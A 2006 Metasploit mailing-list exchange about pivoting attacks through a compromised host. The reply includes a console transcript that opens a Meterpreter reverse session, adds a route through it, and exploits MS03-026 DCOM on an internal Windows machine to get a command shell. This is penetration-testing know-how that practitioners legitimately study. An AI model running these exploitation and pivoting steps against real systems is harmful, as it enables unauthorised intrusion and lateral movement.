Metasploit mailing list archives
staging attack proxy
From: cbyrd01 at gmail.com (Chris Byrd)
Date: Fri, 10 Nov 2006 10:03:24 -0600
What you are looking for is the meterpreter payload. Once a system has meterpreter on it, you should be able to route future exploits through it using the route command. Here's a sample previously posted by mmiller:

msf exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 239 byte payload...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008)
[*] Session 1 created in the background.
msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1
msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135] ...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011)
[*] The DCERPC service did not reply to our request

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

I've had problems getting this to work myself, but I haven't tried it with the more recent versions. If you try it out, please let me know (or post on list) as to your results.

Thanks!

Chris

On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:
Folks,

is there any support for staging attack proxies on metasploit (v2.7 or v3.0)? Searching the docs, I don't see anything.

What I mean by this is whether it is possible to upload a "metasploit agent" to a compromised system and proxy attacks through it (much in the terms of level1 agents on core impact).

I think I read something about this for metasploit, but cannot find any info.

cheers,
/valter

--
o Valter Santos
o Security Analyst
o INFOCON Tactical Overview: http://infocon.sectoid.com
o PGP: 0xE2A4B206
o ..
o Attack is the secret of defense; defense is the planning of an attack.
o Sun Tzu, Art of War